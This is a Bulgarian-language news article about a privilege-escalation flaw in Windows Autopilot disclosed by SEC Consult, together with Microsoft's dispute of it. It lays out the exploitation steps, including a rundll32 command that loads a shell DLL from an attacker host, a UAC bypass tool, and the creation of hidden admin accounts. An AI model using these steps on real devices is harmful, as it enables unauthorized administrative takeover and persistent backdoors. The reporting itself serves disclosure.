Заплахи

Уязвимост в Windows позволява завладяване на компютри

Александър Главчев

Австрийската компания SEC Consult обяви, че е открила уязвимост за повишаване на привилегиите в Microsoft Autopilot, инструмент за разполагане на устройства в корпоративни мрежи. От Microsoft заявяват, че проблемът не е грешка, но от не се съгласиха и публикуваха технически подробности.

Windows Autopilot е пакет от технологии, използвани за персонализиране и предварително конфигуриране на нови устройства в корпоративна мрежа с OEM-оптимизирана версия на Windows 10, която след това може да бъде преобразувана в други варианти на операционната система - Pro или Enterprise.

От SEC Consult са открили критичен, според тях, недостатък, засягащ процеса на разгръщане на Windows Autopilot, който позволява на хакер или дори на обикновен потребител да повиши своите привилегии до ниво локален администратор.

Проблемът е налице в поне два от сценарии за използване на Windows Autopilot - user-driven (управляван от потребителя) и pre-provisioning (предварително подготвено разгръщане). Подчертава се и, че е възможно слабостта да бъде използвана и в други сценарии.

Експлоатацията на уязвимостта става чрез изкуствено създаване на грешка в устройство, на което се разполага софтуер с помощта на Windows Autopilot. Това може да стане чрез изключване от локалната мрежа, или чрез деактивиране на защитния модул TPM. Грешката възниква ако версията на TPM е по-ниска от 2.0.

В прозореца за съобщение за грешка е необходимо да се кликне на бутона ViewDiagnostics, а след това в диалога за избор на папка да се въведе: Rundll32.exe\\10.0.0.1\shell.dll,DLLMain. Това установява връзка между шела и хоста на нападателя като потребител по подразбиране - defaultuser0. Този профил е с административни правомощия.

След това е е необходим инструмент за заобикаляне на UAC системата, като за целта от SEC Consult са използвали StoreFileSys. В резултат нападателят получава възможност да създава локални потребители с администраторски права как и други бекдорове.

Последната стъпка е свързване на устройството обратно към мрежата или да бъде реактивиран TPM модулът му. С това копирането на софтуера продължава и потребителят defaultuser0 формално се премахва. Неговите права обаче остават.

Експертите от SEC Consult са информирали Microsoft за проблема чрез услугата msrc.microsoft.com, като са прикачили към съобщението тестов експлойт. От софтуерния гигант обаче първоначално игнорираха съобщението и след това заявиха, че не е идентифицирана заплаха за сигурността. Последното принуди SEC Consult да вземе решение да публикува технически подрибности за уязвимостта.





© Ай Си Ти Медиа ЕООД 1997-2021 съгласно Общи условия за ползване

X